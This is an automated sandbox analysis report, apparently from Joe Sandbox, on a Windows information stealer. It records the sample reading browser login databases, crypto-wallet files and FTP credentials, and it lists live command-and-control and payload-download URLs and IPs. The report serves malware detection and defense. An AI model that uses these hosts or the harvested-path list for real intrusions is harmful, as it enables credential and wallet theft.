                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                        Source: Yara matchFile source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007AEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,9_2_007AEC48
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007ADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,9_2_007ADF51
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        Scheduled Task/Job
                        12
                        Process Injection
                        3
                        Obfuscated Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol41
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        12
                        Software Packing
                        Security Account Manager11
                        File and Directory Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        Login HookLogin Hook1
                        DLL Side-Loading
                        NTDS235
                        System Information Discovery
                        Distributed Component Object ModelInput Capture124
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell
                        Network Logon ScriptNetwork Logon Script1
                        Masquerading
                        LSA Secrets861
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts451
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Process Injection
                        DCSync451
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582703 Sample: Dl6wuWiQdg.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 28 fancywaxxers.shop 2->28 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 11 other signatures 2->50 8 Dl6wuWiQdg.exe 1 2->8         started        13 skotes.exe 12 2->13         started        15 skotes.exe 2->15         started        signatures3 process4 dnsIp5 30 185.215.113.16, 49748, 49754, 80 WHOLESALECONNECTIONSNL Portugal 8->30 32 fancywaxxers.shop 104.21.112.1, 443, 49712, 49713 CLOUDFLARENETUS United States 8->32 26 C:\Users\user\...\8WYS1MQTL0QCOHKIPL8.exe, PE32 8->26 dropped 60 Detected unpacking (changes PE section rights) 8->60 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Query firmware table information (likely to detect VMs) 8->64 72 6 other signatures 8->72 17 8WYS1MQTL0QCOHKIPL8.exe 4 8->17         started        34 185.215.113.43, 49914, 49930, 49946 WHOLESALECONNECTIONSNL Portugal 13->34 66 Hides threads from debuggers 13->66 68 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->68 70 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->70 file6 signatures7 process8 file9 24 C:\Users\user\AppData\Local\...\skotes.exe, PE32 17->24 dropped 36 Antivirus detection for dropped file 17->36 38 Detected unpacking (changes PE section rights) 17->38 40 Machine Learning detection for dropped file 17->40 42 7 other signatures 17->42 21 skotes.exe 17->21         started        signatures10 process11 signatures12 52 Antivirus detection for dropped file 21->52 54 Detected unpacking (changes PE section rights) 21->54 56 Tries to detect sandboxes and other dynamic analysis tools (window names) 21->56 58 6 other signatures 21->58

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Dl6wuWiQdg.exe56%VirustotalBrowse
                        Dl6wuWiQdg.exe61%ReversingLabsWin32.Trojan.Symmi
                        Dl6wuWiQdg.exe100%AviraTR/Crypt.XPACK.Gen
                        Dl6wuWiQdg.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://fancywaxxers.shop/apih100%Avira URL Cloudmalware
                        https://fancywaxxers.shop/api$F100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpS100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpR100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpa/100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpncoded100%Avira URL Cloudmalware
                        https://fancywaxxers.shop/hn7:C100%Avira URL Cloudmalware
                        http://185.215.113.16/mine/random.exeN40%Avira URL Cloudsafe
                        http://185.215.113.16/steam/random.exeW0%Avira URL Cloudsafe
                        https://fancywaxxers.shop:443/api100%Avira URL Cloudmalware
                        http://185.215.113.16/mine/random.exeoSP&K0%Avira URL Cloudsafe
                        http://185.215.113.43/Zu7JuNko/index.phpI/100%Avira URL Cloudmalware
                        http://185.215.113.16/steam/random.exeV0%Avira URL Cloudsafe
                        https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpE/100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.php1/100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpded100%Avira URL Cloudmalware
                        https://fancywaxxers.shop/in100%Avira URL Cloudmalware
                        https://fancywaxxers.shop/ah100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.phpn100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.php)/100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.php%/100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        fancywaxxers.shop
                        104.21.112.1
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          fancywaxxers.shopfalse
                            high
                            http://185.215.113.43/Zu7JuNko/index.phpfalse
                              high
                              rabidcowse.shopfalse
                                high
                                wholersorie.shopfalse
                                  high
                                  cloudewahsj.shopfalse
                                    high
                                    noisycuttej.shopfalse
                                      high
                                      nearycrepso.shopfalse
                                        high
                                        https://fancywaxxers.shop/apifalse
                                          high
                                          framekgirus.shopfalse
                                            high
                                            tirepublicerj.shopfalse
                                              high
                                              abruptyopsn.shopfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabDl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://185.215.113.43/Zu7JuNko/index.phpSskotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://duckduckgo.com/ac/?q=Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fancywaxxers.shop/apihDl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://185.215.113.43/Zu7JuNko/index.phpaskotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.215.113.16/mine/random.exeDl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2316767012.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://fancywaxxers.shop/api$FDl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgDl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://185.215.113.43/Zu7JuNko/index.phpRskotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://185.215.113.43/Zu7JuNko/index.phpa/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://x1.c.lencr.org/0Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fancywaxxers.shop/hn7:CDl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://185.215.113.16/mine/random.exeN4Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allDl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://185.215.113.16/steam/random.exeWDl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.mozilla.orDl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://fancywaxxers.shop:443/apiDl6wuWiQdg.exe, 00000000.00000003.2184395617.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2184484436.000000000083C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://185.215.113.16/steam/random.exeVDl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://185.215.113.16/mine/random.exeoSP&KDl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoDl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://185.215.113.16/steam/random.exeDl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000083D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://ocsp.rootca1.amazontrust.com0:Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.ecosia.org/newtab/Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.215.113.43/Zu7JuNko/index.phpI/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://185.215.113.43/Zu7JuNko/index.phpE/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://ac.ecosia.org/autocomplete?q=Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://185.215.113.16/Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgDl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
